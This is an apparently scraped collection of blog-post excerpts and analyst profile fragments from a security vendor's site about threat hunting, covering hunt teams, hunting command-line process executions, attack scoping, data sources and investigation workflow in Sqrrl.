You’ve probably heard this a million times now: “You need a hunt team”. This is true, as far as it goes, but why? For most people, the initial answer is probably something close to this: “So we can find bad guys on our network”. Again, this is true, but would it surprise you learn that finding the bad guys is probably the least important reason to have a hunt team?
PowerShell transcripts, Sysmon, Firewall & Host logs
Preferred Hunting Techniques
Anomaly Detection & Offensive Countermeasures
Carbon Black Response, Security Onion, ADHD & Kibana
Processes are executed on systems in a variety of ways. A process might be executed by a user double-clicking an icon, by an automated service running at startup, or by a script referencing a third-party application. While not every attack requires the use of malware, most of them do require the execution of some type of process, even if it is a legitimate process being used for nefarious purposes. In this post, I’ll discuss how hunting for command line process executions can be a useful strategy for finding evil and how Sqrrl can make finding and investigating these events easier.
As defenders, the critical moment is when we’ve determined that an attacker’s attempt to gain a foothold onto the network was successful. This sets of a chain of investigative activity where we follow breadcrumbs through our data to understand where they attacker went, what their mission is, and what they took. As these breadcrumbs are uncovered, we don’t just have to follow their path, we also must ascertain if similar evidence can be found at other points on the network. This is all part of scoping the attacker to better understand the attack. In this post, I’m going to talk about strategies for attack scoping and discuss how Sqrrl enables them intuitively.
- Contextual data is important, but a lot of success can be gained by gathering relatively simple forms of data. For example, flow data can be analyzed with tools like FlowBAT, Bro logs and SiLK to create a comprehensive picture of your network that is very conducive for hunting.
- SOCs should take steps to avoid information siloing, especially when deployment groups within an organization are geographically separated.
- Hunting can be challenging, but is by no means impossible. A lot of good work can be done by getting set up with simple tools and expanding from there. In other words, “Find weirdness in all that data and you’ll learn a lot.”
An incident investigation will only go as far as the evidence allows it. Of course, there’s a lot of components that have to come together to make that happen. The network must support the collection of robust and diverse evidence sources and it must be searchable by the analyst. From there, the incident investigation hinges on the ability of the analyst to ask questions, successfully traverse evidence to answer those questions, and draw conclusions from the findings.
Alan Orlikoski has over 15 years of experience in both the private and public sectors of the IT industry. He has designed and implemented defense solutions for government and Fortune 100 companies. He has more recently participated on teams tasked to assess and advise Fortune 100 clients, with a focus on maturing an organization’s ability to more quickly and effectively detect, respond to, and contain targeted attacks.
Malware Repositories, Passive DNS, Domain Whois
Preferred Hunting Techniques
Link Analysis, malware analysis, link exploration
VirusTotal, PassiveTotal, DomainTools, internal collection tools
Investigations are all about iterating through evidence that helps you make decisions about what events transpired on your network. That sounds easy enough, but asking the right questions and identifying the data you need to answer them is tricky. This problem manifests in two ways. First, not having enough of the right data means you may be unable to answer the questions that will move the investigation forward. Conversely, having too much data may be overwhelming with a tremendous number of fields and complementary evidence sources to examine. In either case, asking good questions and moving towards a conclusion quickly and accurately depends on knowing what data is available to you in any given scenario. In this post, I’ll address these concerns and discuss how Sqrrl helps you better understand your data so that you know where the gaps are and what options you have available to you within the context of an active investigation.
Finding evil is all about asking the right questions, finding answers, and using those answers to ask more questions. Each question and answer represent a decision point, branching the investigation off down a new path. The path of the analyst is far from linear, and sometimes we need to go back and retrace our steps to work from a previous decision point. Just like Hansel and Gretel left breadcrumbs along their path through the woods, we too need breadcrumbs to ensure that we’re fully exploring our hypotheses and seeing the whole picture of an investigation clearly.